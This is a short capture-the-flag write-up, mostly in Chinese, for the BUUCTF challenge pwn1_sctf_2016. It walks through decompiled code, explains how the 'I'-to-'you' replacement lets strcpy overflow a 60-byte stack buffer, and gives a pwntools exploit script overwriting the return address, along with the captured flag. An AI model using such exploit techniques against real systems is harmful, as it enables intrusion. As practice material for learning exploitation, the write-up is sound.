BUU-4-pwn1_sctf_2016
lxl@lxl-vm:~/BUU/pwn1_sctf_20161$ file pwn1_sctf_2016 pwn1_sctf_2016: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, for GNU/Linux 2.6.24, BuildID[sha1]=4b1df4d30f1d6b75666c64bed078473a4ad8e799, not stripped
Arch: i386-32-little RELRO: Partial RELRO Stack: No canary found NX: NX enabled PIE: No PIE (0x8048000)
IDA 32
int __cdecl main(int argc, const char **argv, const char **envp) { vuln(); return 0; }
int vuln() { const char *v0; // eax char s; // [esp+1Ch] [ebp-3Ch] char v3; // [esp+3Ch] [ebp-1Ch] char v4; // [esp+40h] [ebp-18h] char v5; // [esp+47h] [ebp-11h] char v6; // [esp+48h] [ebp-10h] char v7; // [esp+4Fh] [ebp-9h] printf("Tell me something about yourself: "); fgets(&s, 32, edata); std::string::operator=(&input, &s); std::allocator<char>::allocator(&v5); std::string::string(&v4, "you", &v5); std::allocator<char>::allocator(&v7); std::string::string(&v6, "I", &v7); replace((std::string *)&v3); std::string::operator=(&input, &v3, &v6, &v4); std::string::~string((std::string *)&v3); std::string::~string((std::string *)&v6); std::allocator<char>::~allocator(&v7); std::string::~string((std::string *)&v4); std::allocator<char>::~allocator(&v5); v0 = (const char *)std::string::c_str((std::string *)&input); strcpy(&s, v0); return printf("So, %s\n", &s); }
将输入的’I’转化为’you’,然后输出“So,%s”
在fgets处,限制了输入的s长度,不能溢出。在strcpy函数中,未对s进行限制,v0对输入的I进行变换后:v0长度=‘I’的个数*3。
输入的I的长度最多为32,v0最长为32*3=96,远大于3C(s长度=60),可以进行溢出,需要3C+4 = 64位 = 21个‘I’ + 1个‘A’
EXP
from pwn import * p = remote('node3.buuoj.cn',27033) catflag_address = 0x08048F0D payload = 21*'I'+'A'+ p32(catflag_address) p.sendline(payload) p.interactive()
lxl@lxl-vm:~/BUU/pwn1_sctf_20161$ python sctf.py [+] Opening connection to node3.buuoj.cn on port 28772: Done [*] Switching to interactive mode flag{a042f209-9e11-431f-9ef3-4431a390ae6c} timeout: the monitored command dumped core [*] Got EOF while reading in interactive $
flag{a042f209-9e11-431f-9ef3-4431a390ae6c}